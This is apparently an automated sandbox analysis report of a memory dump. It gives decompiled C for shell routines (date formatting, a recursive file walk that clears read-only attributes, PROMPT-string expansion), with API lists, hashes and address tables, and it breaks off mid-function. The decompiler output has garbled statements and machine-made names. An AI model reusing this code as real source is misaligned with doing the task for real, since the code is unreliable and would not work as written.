0x00335cf3
0x00335cf9
0x00349b2d
0x00349b31
0x00349b35
0x00349b35
0x00349b3e
0x00349b82
0x00349b40
0x00349b40
0x00349b46
0x00349b4b
0x00349b51
0x00349b51
0x00349b54
0x00349b56
0x00349b65
0x00349b74
0x00349b7a
0x00349b7a
0x00000000
0x00349b3e
0x00335cff
0x00335d01
0x00335d04
0x00335d04
0x00335d07
0x00335d09
0x00335d23
0x00335d29
0x00335d2c
0x00335d2c
0x00335bf4
0x00335bf4
0x00335bf9
0x00335bfe
0x00335bfe
0x00335c01
0x00000000
0x00335c01
0x00335bc3

APIs

GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,0035F830,?,00002000), ref: 00335B31
SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00335B45
FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 00335B59
FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00335B6D
realloc.MSVCRT ref: 00349C24

Part of subcall function 003441A4: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00335BA1,0000001F,?,00000080), ref: 003441A4

GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001F,?,00000080), ref: 00335BA2
GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?), ref: 00335C2A
memmove.MSVCRT ref: 00335D23
GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000000), ref: 00335D4D
realloc.MSVCRT ref: 00335D68
GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000001), ref: 00335D9C

Strings

%s , xrefs: 00349C7C
%02d%s%02d%s%02d, xrefs: 00349C5B
%s %s , xrefs: 00349C9C

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Time$File$DateFormatSystem$realloc$DefaultInfoLocalLocaleUsermemmove
String ID: %02d%s%02d%s%02d$%s $%s %s
API String ID: 2927284792-4023967598
Opcode ID: ddc0a2b131ee45eb50e617bb1144c6f12a2a21ad12ed0e8f18099939f8430f51
Instruction ID: 97db7617669506c7b6f52de83e91bec7c661f20f1c801ab78218038c906795dd
Opcode Fuzzy Hash: ddc0a2b131ee45eb50e617bb1144c6f12a2a21ad12ed0e8f18099939f8430f51
Instruction Fuzzy Hash: D9C1C8719006289FDB279F54DC85BEB77FCEB89301F1141A6E80AEF251EA316E85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 003385EA, Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 378
fileCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E003385EA(WCHAR* __ecx, long __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				struct _WIN32_FIND_DATAW _v1140;
				WCHAR* _v1144;
				long _v1148;
				void* _v1152;
				char _v1156;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t104;
				short _t117;
				void* _t121;
				signed int _t122;
				signed int _t124;
				WCHAR* _t126;
				void* _t127;
				void* _t130;
				WCHAR* _t136;
				intOrPtr _t139;
				WCHAR* _t140;
				WCHAR* _t144;
				intOrPtr _t147;
				WCHAR* _t151;
				WCHAR* _t153;
				WCHAR* _t158;
				WCHAR* _t159;
				long _t160;
				long _t162;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				WCHAR* _t168;
				WCHAR* _t169;
				void* _t173;
				void* _t177;
				long _t178;
				void* _t179;
				void* _t180;
				short* _t186;
				signed int _t188;
				long _t192;
				signed int _t193;
				signed int _t194;
				intOrPtr* _t197;
				signed int _t198;
				signed int _t199;
				intOrPtr* _t203;
				signed int _t205;
				WCHAR* _t207;
				char* _t208;
				char* _t209;
				long _t214;
				signed int _t220;
				WCHAR* _t221;
				signed int _t222;
				long _t223;
				signed int _t224;
				void* _t225;
				void* _t226;
				void* _t241;
				void* _t260;

				_t217 = __edx;
				_t104 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t104 ^ _t224;
				_v24 = 1;
				_t223 = 0;
				_v20 = 0x104;
				_v28 = 0;
				_t220 = __edx;
				_t176 = __ecx;
				_v1148 = __edx;
				_v1144 = __ecx;
				memset( &_v548, 0, 0x104);
				_t226 = _t225 + 0xc;
				if(E00340C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					_t223 = 8;
					goto L43;
				} else {
					 *_t220 = 1;
					_t221 = _t176;
					_t186 =  &(_t221[1]);
					do {
						_t117 =  *_t221;
						_t221 =  &(_t221[1]);
					} while (_t117 != 0);
					_t222 = _t221 - _t186;
					_t220 = _t222 >> 1;
					if(_t222 == 0) {
						_t223 = 0xa1;
						L43:
						__imp__??_V@YAXPAX@Z();
						return E00346FD0(_t223, _t176, _v8 ^ _t224, _t217, _t220, _t223, _v28);
					}
					if(_t220 + 3 > 0x7fe7) {
						L42:
						_t223 = E00338885(_t176);
						goto L43;
					}
					_t121 = FindFirstFileW(_t176,  &_v1140);
					if(_t121 == 0xffffffff) {
						_t122 = 0x10;
						_t188 = 0;
						_v1140.dwFileAttributes = _t122;
						_v1140.dwReserved0 = 0;
					} else {
						FindClose(_t121);
						_t188 = _v1140.dwReserved0;
						_t122 = _v1140.dwFileAttributes;
					}
					if((_t122 & 0x00000010) == 0) {
						goto L42;
					} else {
						if((_t122 & 0x00000400) != 0) {
							__eflags = _t188 & 0x20000000;
							if((_t188 & 0x20000000) != 0) {
								goto L42;
							}
						}
						E00340D89(_t217, _t176);
						_t124 =  *(_t176 + _t220 * 2 - 2) & 0x0000ffff;
						if(_t124 != 0x3a && _t124 != 0x5c) {
							E00340CF2(_t217, "\\");
							_t220 = _t220 + 1;
						}
						E00340CF2(_t217, "*");
						_t126 = _v28;
						if(_t126 == 0) {
							_t126 =  &_v548;
						}
						_t127 = FindFirstFileW(_t126,  &_v1140);
						_v1152 = _t127;
						if(_t127 == 0xffffffff) {
							goto L42;
						} else {
							while(1) {
								L14:
								_t241 =  *0x35d544 - _t223; // 0x0
								if(_t241 != 0) {
									break;
								}
								_t217 =  &(_v1140.cAlternateFileName);
								_t192 = _t217;
								_t177 = _t192 + 2;
								do {
									_t130 =  *_t192;
									_t192 = _t192 + 2;
								} while (_t130 != _t223);
								_t193 = _t192 - _t177;
								_t194 = _t193 >> 1;
								if(_t193 != 0) {
									L21:
									if(_t194 + _t220 >= 0x7fe7) {
										_t176 = _v1144;
										_push(_t217);
										 *_v1148 = _t223;
										E0033C5A2(_t194, 0x400023da, 2, _v1144);
										L41:
										FindClose(_v1152);
										_t260 =  *0x35d544 - _t223; // 0x0
										if(_t260 != 0) {
											goto L43;
										}
										goto L42;
									}
									_t134 = _v28;
									if(_v28 == 0) {
										_t134 =  &_v548;
									}
									E00341040(_t134 + _t220 * 2, _v20 - _t220, _t217);
									_t178 = _v1140.dwFileAttributes;
									if((_t178 & 0x00000010) == 0) {
										__eflags = _t178 & 0x00000001;
										if((_t178 & 0x00000001) != 0) {
											_t207 = _v28;
											__eflags = _t207;
											if(_t207 == 0) {
												_t207 =  &_v548;
											}
											_t162 = _t178 & 0xfffffffe;
											__eflags = _t162;
											SetFileAttributesW(_t207, _t162);
										}
										_t196 = _v28;
										__eflags = _v28;
										if(_v28 == 0) {
											_t196 =  &_v548;
										}
										_t217 = _t178;
										_t136 = E003383F2(_t196, _t178);
										__eflags = _t136;
										if(_t136 == 0) {
											goto L39;
										} else {
											__eflags = _t136 - 0x4d3;
											if(_t136 == 0x4d3) {
												break;
											}
											__eflags = _t136 - 3;
											if(_t136 == 3) {
												_t158 = _v28;
												__eflags = _t158;
												if(_t158 == 0) {
													_t158 =  &_v548;
												}
												__imp___wcsnicmp(_t158, L"\\\\?\\", 4);
												_t226 = _t226 + 0xc;
												__eflags = _t158;
												if(_t158 != 0) {
													_t159 = _v28;
													__eflags = _t159;
													if(_t159 == 0) {
														_t159 =  &_v548;
													}
													_t160 = GetFullPathNameW(_t159, _t223, _t223, _t223);
													__eflags = _t160 - 0x7fe7;
													if(_t160 > 0x7fe7) {
														SetLastError(0x6f);
													}
												}
											}
											_t197 =  &(_v1140.cAlternateFileName);
											_t217 = _t197 + 2;
											do {
												_t139 =  *_t197;
												_t197 = _t197 + 2;
												__eflags = _t139 - _t223;
											} while (_t139 != _t223);
											_t140 = _v28;
											_t198 = _t197 - _t217;
											__eflags = _t198;
											_t199 = _t198 >> 1;
											if(_t198 == 0) {
												L86:
												__eflags = _t140;
												if(_t140 == 0) {
													_t140 =  &_v548;
												}
												E0033C5A2(_t199, 0x4000271b, 1, _t140);
												_t226 = _t226 + 0xc;
												L89:
												_push(_t223);
												_push(GetLastError());
												E0033C5A2(_t199);
												_t144 = _v28;
												__eflags = _t144;
												if(_t144 == 0) {
													_t144 =  &_v548;
												}
												SetFileAttributesW(_t144, _t178);
												 *_v1148 = _t223;
												goto L39;
											}
											__eflags = _t140;
											if(_t140 == 0) {
												_t140 =  &_v548;
											}
											__eflags = 0;
											_t140[_t220] = 0;
											_t203 =  &(_v1140.cFileName);
											_t217 = _t203 + 2;
											do {
												_t147 =  *_t203;
												_t203 = _t203 + 2;
												__eflags = _t147 - _t223;
											} while (_t147 != _t223);
											_t205 = _t203 - _t217 >> 1;
											_t199 =  &_v548;
											__eflags = _t205 + _t220 - 0x7fe7;
											if(_t205 + _t220 < 0x7fe7) {
												E00340CF2(_t217,  &(_v1140.cFileName));
												_t151 = _v28;
												__eflags = _t151;
												if(_t151 == 0) {
													_t151 =  &_v548;
												}
												E0033C5A2(_t199, 0x4000271b, 1, _t151);
												_t153 = _v28;
												_t226 = _t226 + 0xc;
												__eflags = _t153;
												if(_t153 == 0) {
													_t153 =  &_v548;
												}
												_t153[_t220] = 0;
												_t199 =  &_v548;
												E00340CF2(_t217,  &(_v1140.cAlternateFileName));
												goto L89;
											}
											E00340CF2(_t217,  &(_v1140.cAlternateFileName));
											_t140 = _v28;
											goto L86;
										}
									} else {
										_t208 = ".";
										_t164 =  &(_v1140.cFileName);
										_t179 = 4;
										while(1) {
											_t217 =  *_t164;
											if(_t217 !=  *_t208) {
												break;
											}
											if(_t217 == 0) {
												L29:
												_t165 = _t223;
												L30:
												if(_t165 == 0) {
													L39:
													if(FindNextFileW(_v1152,  &_v1140) != 0) {
														goto L14;
													}
													goto L40;
												}
												_t209 = L"..";
												_t166 =  &(_v1140.cFileName);
												while(1) {
													_t217 =  *_t166;
													if(_t217 !=  *_t209) {
														break;
													}
													if(_t217 == 0) {
														L36:
														_t167 = _t223;
														L38:
														if(_t167 != 0) {
															_t210 = _v28;
															__eflags = _v28;
															if(_v28 == 0) {
																_t210 =  &_v548;
															}
															_t217 =  &_v1156;
															_t168 = E003385EA(_t210,  &_v1156);
															__eflags =  *0x35d544 - _t223; // 0x0
															if(__eflags != 0) {
																goto L40;
															} else {
																__eflags = _t168;
																if(_t168 == 0) {
																	goto L39;
																}
																_t211 = _v1148;
																 *_v1148 = _t223;
																__eflags = _t168 - 0x91;
																if(_t168 != 0x91) {
																	L58:
																	_t169 = _v28;
																	__eflags = _t169;
																	if(_t169 == 0) {
																		_t169 =  &_v548;
																	}
																	E0033C5A2(_t211, 0x4000271b, 1, _t169);
																	_t226 = _t226 + 0xc;
																	_push(_t223);
																	_push(GetLastError());
																	E0033C5A2(_t211);
																	goto L39;
																}
																__eflags = _v1156 - _t223;
																if(_v1156 == _t223) {
																	goto L39;
																}
																goto L58;
															}
														}
														goto L39;
													}
													_t217 =  *((intOrPtr*)(_t166 + 2));
													_t47 =  &(_t209[2]); // 0x2e
													if(_t217 !=  *_t47) {
														break;
													}
													_t166 = _t166 + _t179;
													_t209 =  &(_t209[_t179]);
													if(_t217 != 0) {
														continue;
													}
													goto L36;
												}
												asm("sbb eax, eax");
												_t167 = _t166 | 0x00000001;
												__eflags = _t167;
												goto L38;
											}
											_t217 =  *((intOrPtr*)(_t164 + 2));
											_t44 =  &(_t208[2]); // 0x200000
											if(_t217 !=  *_t44) {
												break;
											}
											_t164 = _t164 + _t179;
											_t208 =  &(_t208[_t179]);
											if(_t217 != 0) {
												continue;
											}
											goto L29;
										}
										asm("sbb eax, eax");
										_t165 = _t164 | 0x00000001;
										goto L30;
									}
								}
								_t217 =  &(_v1140.cFileName);
								_t214 = _t217;
								_t180 = _t214 + 2;
								do {
									_t173 =  *_t214;
									_t214 = _t214 + 2;
								} while (_t173 != _t223);
								_t194 = _t214 - _t180 >> 1;
								goto L21;
							}
							L40:
							_t176 = _v1144;
							goto L41;
						}
					}
				}
			}

0x003385ea
0x003385f5
0x003385fc
0x00338607
0x0033860c
0x0033860e
0x00338617
0x0033861a
0x0033861c
0x00338620
0x00338626
0x0033862c
0x00338639
0x00338655
0x00338882
0x00000000
0x0033865b
0x0033865b
0x00338661
0x00338663
0x00338666
0x00338666
0x00338669
0x0033866c
0x00338671
0x00338673
0x00338675
0x003503bb
0x00338859
0x0033885c
0x00338875
0x00338875
0x00338683
0x00338850
0x00338857
0x00000000
0x00338857
0x00338691
0x0033869a
0x003503c7
0x003503c8
0x003503ca
0x003503d0
0x003386a0
0x003386a1
0x003386a7
0x003386ad
0x003386ad
0x003386b5
0x00000000
0x003386bb
0x003386c0
0x003503db
0x003503e1
0x00000000
0x00000000
0x003503e7
0x003386cd
0x003386d2
0x003386da
0x003386ec
0x003386f1
0x003386f1
0x003386fd
0x00338702
0x00338707
0x003503ec
0x003503ec
0x00338715
0x0033871b
0x00338724
0x00000000
0x0033872a
0x0033872a
0x0033872a
0x0033872a
0x00338730
0x00000000
0x00000000
0x00338736
0x0033873c
0x0033873e
0x00338741
0x00338741
0x00338744
0x00338747
0x0033874c
0x0033874e
0x00338750
0x0033876c
0x00338774
0x00350615
0x0035061b
0x00350624
0x00350626
0x0033883b
0x00338842
0x00338848
0x0033884e
0x00000000
0x00000000
0x00000000
0x0033884e
0x0033877a
0x0033877f
0x003503f7
0x003503f7
0x0033878e
0x00338793
0x0033879c
0x0035047a
0x0035047d
0x0035047f
0x00350482
0x00350484
0x00350486
0x00350486
0x0035048e
0x0035048e
0x00350493
0x00350493
0x00350499
0x0035049c
0x0035049e
0x003504a0
0x003504a0
0x003504a6
0x003504a8
0x003504ad
0x003504af
0x00000000
0x003504b5
0x003504b5
0x003504ba
0x00000000
0x00000000
0x003504c0
0x003504c3
0x003504c5
0x003504c8
0x003504ca
0x003504cc
0x003504cc
0x003504da
0x003504e0
0x003504e3
0x003504e5
0x003504e7
0x003504ea
0x003504ec
0x003504ee
0x003504ee
0x003504f8
0x003504fe
0x00350503
0x00350507
0x00350507
0x00350503
0x003504e5
0x0035050d
0x00350513
0x00350516
0x00350516
0x00350519
0x0035051c
0x0035051c
0x00350521
0x00350524
0x00350524
0x00350526
0x00350528
0x00350571
0x00350571
0x00350573
0x00350575
0x00350575
0x00350583
0x00350588
0x0035058b
0x0035058b
0x00350592
0x00350593
0x00350598
0x0035059d
0x0035059f
0x003505a1
0x003505a1
0x003505a9
0x003505b5
0x00000000
0x003505b5
0x0035052a
0x0035052c
0x0035052e
0x0035052e
0x00350534
0x00350536
0x0035053a
0x00350540
0x00350543
0x00350543
0x00350546
0x00350549
0x00350549
0x00350550
0x00350555
0x0035055b
0x00350560
0x003505c3
0x003505c8
0x003505cb
0x003505cd
0x003505cf
0x003505cf
0x003505dd
0x003505e2
0x003505e5
0x003505e8
0x003505ea
0x003505ec
0x003505ec
0x003505f4
0x003505ff
0x00350605
0x00000000
0x00350605
0x00350569
0x0035056e
0x00000000
0x0035056e
0x003387a2
0x003387a4
0x003387a9
0x003387af
0x003387b0
0x003387b0
0x003387b6
0x00000000
0x00000000
0x003387bf
0x003387d8
0x003387d8
0x003387da
0x003387dc
0x0033881a
0x0033882f
0x00000000
0x00000000
0x00000000
0x0033882f
0x003387de
0x003387e3
0x003387e9
0x003387e9
0x003387ef
0x00000000
0x00000000
0x003387f4
0x00338809
0x00338809
0x00338812
0x00338814
0x00350402
0x00350405
0x00350407
0x00350409
0x00350409
0x0035040f
0x00350415
0x0035041a
0x00350420
0x00000000
0x00350426
0x00350426
0x00350428
0x00000000
0x00000000
0x0035042e
0x00350434
0x00350436
0x0035043b
0x00350449
0x00350449
0x0035044c
0x0035044e
0x00350450
0x00350450
0x0035045e
0x00350463
0x00350466
0x0035046d
0x0035046e
0x00000000
0x00350474
0x0035043d
0x00350443
0x00000000
0x00000000
0x00000000
0x00350443
0x00350420
0x00000000
0x00338814
0x003387f6
0x003387fa
0x003387fe
0x00000000
0x00000000
0x00338800
0x00338802
0x00338807
0x00000000
0x00000000
0x00000000
0x00338807
0x0033880d
0x0033880f
0x0033880f
0x00000000
0x0033880f
0x003387c1
0x003387c5
0x003387c9
0x00000000
0x00000000
0x003387cf
0x003387d1
0x003387d6
0x00000000
0x00000000
0x00000000
0x003387d6
0x00338876
0x00338878
0x00000000
0x00338878
0x0033879c
0x00338752
0x00338758
0x0033875a
0x0033875d
0x0033875d
0x00338760
0x00338763
0x0033876a
0x00000000
0x0033876a
0x00338835
0x00338835
0x00000000
0x00338835
0x00338724
0x003386b5

APIs

memset.MSVCRT ref: 0033862C

Part of subcall function 00340C70: ??_V@YAXPAX@Z.MSVCRT ref: 00340CBA
Part of subcall function 00340C70: memset.MSVCRT ref: 00340CDD

FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,-00000105), ref: 00338691
FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105), ref: 003386A1
FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,0033250C,?,?,?,-00000105), ref: 00338715
FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,-00000105), ref: 00338827
FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000105), ref: 00338842
??_V@YAXPAX@Z.MSVCRT ref: 0033885C

Strings

\\?\, xrefs: 003504D4

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Find$File$CloseFirstmemset$Next
String ID: \\?\
API String ID: 3059144641-4282027825
Opcode ID: aac8c15bb9a2b0166c2f7fbc5f58b0f65d1500e911987c37a13e2e2bfca9e474
Instruction ID: b244f28e4112f1a29be5fd41e16df184ea6d529415eeb8433b3260a22bce88f5
Opcode Fuzzy Hash: aac8c15bb9a2b0166c2f7fbc5f58b0f65d1500e911987c37a13e2e2bfca9e474
Instruction Fuzzy Hash: 4FD1F270A002199BDF2ADB64CCC5FBA7379EF14304F5505A9EA0ADB191EB31AE85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00356FF0, Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 464
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E00356FF0(void* __ecx) {
				intOrPtr _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				intOrPtr _v36;
				signed int _v48;
				void _v50;
				void _v52;
				void _v54;
				short _v56;
				char _v124;
				char _v644;
				void* _v648;
				void* _v652;
				signed int _v656;
				signed short* _v660;
				signed short* _v664;
				WCHAR* _v668;
				signed int _v672;
				void* _v676;
				char _v680;
				char _v684;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t111;
				signed int _t112;
				intOrPtr _t119;
				void _t121;
				signed short _t122;
				signed int _t125;
				signed int _t126;
				void _t131;
				void _t136;
				intOrPtr* _t138;
				void _t142;
				signed int _t153;
				signed short* _t163;
				intOrPtr* _t164;
				void* _t167;
				signed short* _t173;
				signed int _t174;
				void* _t184;
				signed int _t187;
				void* _t188;
				signed int _t189;
				signed int _t190;
				void* _t191;
				signed int _t193;
				void* _t196;
				void* _t199;
				signed short* _t200;
				void* _t201;
				intOrPtr* _t202;
				signed int _t204;
				void* _t207;
				void* _t209;
				void* _t210;
				void* _t211;
				signed short* _t213;
				void* _t214;
				signed int _t219;
				signed int _t221;
				intOrPtr _t222;
				signed int _t226;
				intOrPtr _t227;
				intOrPtr _t228;

				_t153 = _t219;
				_push(__ecx);
				_push(__ecx);
				_t221 = (_t219 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t153 + 4));
				_t217 = _t221;
				_push(0xfffffffe);
				_push(0x35c140);
				_push(E00347290);
				_push( *[fs:0x0]);
				_push(__ecx);
				_push(__ecx);
				_push(_t153);
				_t222 = _t221 - 0x288;
				_t111 =  *0x35d0b4; // 0xd59bd0e8
				_v20 = _v20 ^ _t111;
				_t112 = _t111 ^ _t221;
				_v48 = _t112;
				_push(_t112);
				_t113 =  &_v28;
				 *[fs:0x0] =  &_v28;
				_v36 = _t222;
				_v672 = 0;
				_t226 =  *0x35d544; // 0x0
				if(_t226 != 0) {
					_push(0);
					_push(0x2335);
					_t113 = E0033C108(__ecx);
					EnterCriticalSection( *0x363858);
					 *0x35d544 = 0;
					LeaveCriticalSection( *0x363858);
				}
				_t227 =  *0x35d0c8; // 0x1
				if(_t227 == 0) {
					L96:
					 *[fs:0x0] = _v28;
					_pop(_t199);
					_pop(_t207);
					return E00346FD0(_t113, _t153, _v48 ^ _t217, _t182, _t199, _t207);
				} else {
					_t228 =  *0x35d5c8; // 0x0
					if(_t228 == 0) {
						E003425D9(L"\r\n");
					}
					if( *0x367896 == 0) {
						_t200 = E0033CFBC(L"PROMPT");
						_v660 = _t200;
						if(_t200 != 0) {
							_v660 = 0x378110;
							E00341040(0x378110, 0x200, _t200);
							 *0x367896 = 1;
						}
					} else {
						_v660 = 0x378110;
					}
					_t160 =  *0x373cb8;
					if( *0x373cb8 == 0) {
						_t160 = 0x373ab0;
					}
					_t182 =  *0x373cc0;
					E003436CB(_t153, _t160,  *0x373cc0, 0);
					_t113 = E00356FA6( &_v680);
					_v676 = _t113;
					if(_t113 == 0) {
						goto L96;
					} else {
						_t201 = _t113;
						_v652 = _t201;
						 *_t113 = 0;
						_t209 = _v680 - 1;
						_v648 = _t209;
						_t163 = _v660;
						if(_t163 == 0) {
							L86:
							_t117 =  *0x373cb8;
							if( *0x373cb8 == 0) {
								_t117 = 0x373ab0;
							}
							_t202 = _v676;
							E0034274C(_t202, _t209, L"%s>", _t117);
							_t164 = _t202;
							_t103 = _t164 + 2; // 0x2
							_t210 = _t103;
							do {
								_t119 =  *_t164;
								_t164 = _t164 + 2;
							} while (_t119 != 0);
							_t201 = _t202 + (_t164 - _t210 >> 1) * 2;
							L91:
							_t167 = 0;
							L92:
							 *_t201 = 0;
							_t203 = _v676;
							_t184 = _v676;
							_t107 = _t184 + 2; // 0x2
							_t211 = _t107;
							do {
								_t121 =  *_t184;
								_t184 = _t184 + 2;
							} while (_t121 != _t167);
							_t182 = _t184 - _t211 >> 1;
							_t113 = E00342616(_t203, _t184 - _t211 >> 1);
							if( *0x35d544 != 0) {
								EnterCriticalSection( *0x363858);
								 *0x35d544 =  *0x35d544 & 0x00000000;
								LeaveCriticalSection( *0x363858);
							}
							goto L96;
						}
						_t122 =  *_t163 & 0x0000ffff;
						if(_t122 == 0) {
							goto L86;
						}
						L14:
						while(_t122 != 0) {
							if(_t122 == 0x24) {
								_t213 =  &(_v660[1]);
								_v660 = _t213;
								_v664 = _t213;
								_t204 = 0;
								_v656 = 0x333b90;
								while(towupper( *_t213 & 0x0000ffff) !=  *_v656) {
									_t204 = _t204 + 1;
									_t35 = 0x333b90 + _t204 * 6; // 0x30050
									_t138 = _t35;
									_v656 = _t138;
									_t167 = 0;
									if( *_t138 != 0) {
										continue;
									}
									L28:
									_t125 = _t204 * 6;
									_t201 = _v652;
									_t214 = _v648;
									if( *((intOrPtr*)(_t125 + 0x333b90)) == _t167) {
										goto L92;
									}
									_t40 = _t125 + 0x333b92; // 0x3
									_t187 =  *_t40 & 0x0000ffff;
									if(_t187 != 8) {
										_t45 = _t187 - 1; // 0x2
										_t126 = _t45;
										if(_t126 > 9) {
											L78:
											_t127 =  *0x373cb8;
											if( *0x373cb8 == 0) {
												_t127 = 0x373ab0;
											}
											E0034274C(_t201, _t214, L"%c",  *_t127 & 0x0000ffff);
											_t222 = _t222 + 0x10;
											_t188 = _t201;
											_v664 = _t188 + 2;
											do {
												_t131 =  *_t188;
												_t188 = _t188 + 2;
											} while (_t131 != 0);
											_t189 = _t188 - _v664;
											L83:
											_t190 = _t189 >> 1;
											_t209 = _t214 - _t190;
											_t201 = _t201 + _t190 * 2;
											L84:
											_v648 = _t209;
											_v652 = _t201;
											L85:
											_t173 =  &(_v660[1]);
											_v660 = _t173;
											_t122 =  *_t173 & 0x0000ffff;
											goto L14;
										}
										switch( *((intOrPtr*)(_t126 * 4 +  &M00357698))) {
											case 0:
												_t132 = E003396A0(0, 1, _t201, _t214);
												goto L36;
											case 1:
												__edx = 0;
												__edx = 1;
												__ecx = 0;
												__eax = E00335AEF(0, 1, __edi, __esi);
												L36:
												_t201 = _t201 + _t132 * 2;
												_t209 = _t214 - _t132;
												goto L84;
											case 2:
												__eax =  *0x373cb8;
												if( *0x373cb8 == 0) {
													__eax = 0x373ab0;
												}
												__eax = E0034274C(__edi, __esi, L"%s", __eax);
												__edx = __edi;
												__eax = __edx + 2;
												_v656 = __edx + 2;
												__ecx = 0;
												do {
													__ax =  *__edx;
													__edx = __edx + 2;
												} while (__ax != __cx);
												__edx = __edx - _v656;
												goto L83;
											case 3:
												__ecx =  &_v124;
												E0033443C(__ecx) =  &_v124;
												__esi = E0033B3FC(__ecx, 0x2350,  &_v124);
												E0034274C(__edi, _v648, L"%s", __esi) = LocalFree(__esi);
												__edx = __edi;
												__esi = __edx + 2;
												__ecx = 0;
												do {
													__ax =  *__edx;
													__edx = __edx + 2;
												} while (__ax != __cx);
												__edx = __edx - __esi;
												__esi = _v648;
												goto L83;
											case 4:
												__eax = 0x333948;
												if(_v672 == 0) {
													__eax = 0x333958;
												}
												__edx = __esi;
												__ecx = __edi;
												__eax = E00341040(__edi, __esi, __eax);
												__edx = __edi;
												__eax = __edx + 2;
												_v656 = __edx + 2;
												__ecx = 0;
												do {
													__ax =  *__edx;
													__edx = __edx + 2;
												} while (__ax != __cx);
												__edx = __edx - _v656;
												goto L83;
											case 5:
												__edx = __esi;
												__ecx = __edi;
												__eax = E00341040(__edi, __esi, L"\r\n");
												__edx = __edi;
												__eax = __edx + 2;
												_v656 = __edx + 2;
												__ecx = 0;
												do {
													__ax =  *__edx;
													__edx = __edx + 2;
												} while (__ax != __cx);
												__edx = __edx - _v656;
												goto L83;
											case 6:
												goto L78;
											case 7:
												if( *0x373cc9 == 0) {
													goto L85;
												}
												__ecx =  *0x373ce4;
												while(__esi > 1) {
													__eax = __ecx;
													__ecx = __ecx - 1;
													if(__eax == 0) {
														goto L85;
													}
													_push(0x2b);
													_pop(__eax);
													 *__edi = __ax;
													__edi = __edi + 2;
													_v652 = __edi;
													__esi = __esi - 1;
													_v648 = __esi;
												}
												goto L85;
											case 8:
												if( *0x373cc9 == 0) {
													goto L85;
												}
												_v668 = __ecx;
												__ecx =  *0x373cb8;
												__eax = __ecx;
												if(__ecx == 0) {
													__eax = 0x373ab0;
												}
												__ax =  *__eax;
												_v56 =  *__eax;
												if(__ecx == 0) {
													__ecx = 0x373ab0;
												}
												__ax =  *((intOrPtr*)(__ecx + 2));
												_v54 = __ax;
												_push(0x5c);
												_pop(__eax);
												_v52 = __ax;
												__eax = 0;
												_v50 = __ax;
												__eax =  &_v56;
												if(GetDriveTypeW( &_v56) != 4) {
													goto L85;
												} else {
													__eax = 0;
													_v52 = __ax;
													_v684 = 0x104;
													_v16 = _v16 & 0;
													__eax = E00347797(__ecx);
													if(__al == 0) {
														_v668 = 0x78;
													} else {
														__eax =  &_v684;
														_push( &_v684);
														__eax =  &_v644;
														_push( &_v644);
														__eax =  &_v56;
														_push( &_v56);
														__eax =  *0x37c028();
														_v668 =  &_v56;
													}
													_v16 = 0xfffffffe;
													if(_v668 == 0) {
														 &_v644 = E0034274C(__edi, __esi, L"%s ",  &_v644);
														__edx = __edi;
														__eax = __edx + 2;
														_v664 = __edx + 2;
														__ecx = 0;
														do {
															__ax =  *__edx;
															__edx = __edx + 2;
														} while (__ax != __cx);
														__edx = __edx - _v664;
													} else {
														if(_v668 == 0x8ca) {
															goto L85;
														}
														_push(L"Unknown");
														_push(__esi);
														_push(__edi);
														__eax = E0034274C();
														__esp = __esp + 0xc;
														__edx = __edi;
														__eax = __edx + 2;
														_v664 = __edx + 2;
														__ecx = 0;
														do {
															__ax =  *__edx;
															__edx = __edx + 2;
														} while (__ax != __cx);
														__edx = __edx - _v664;
													}
													goto L83;
												}
										}
									}
									_t41 = _t125 + 0x333b94; // 0x450000
									E0034274C(_t201, _t214, L"%c",  *_t41 & 0x0000ffff);
									_t222 = _t222 + 0x10;
									_t196 = _t201;
									_v656 = _t196 + 2;
									do {
										_t136 =  *_t196;
										_t196 = _t196 + 2;
									} while (_t136 != 0);
									_t189 = _t196 - _v656;
									goto L83;
								}
								_t167 = 0;
								goto L28;
							}
							E0034274C(_t201, _t209, L"%c", _t122 & 0x0000ffff);
							_t222 = _t222 + 0x10;
							_t191 = _t201;
							_t18 = _t191 + 2; // 0x2
							_v656 = _t18;
							_t174 = 0;
							do {
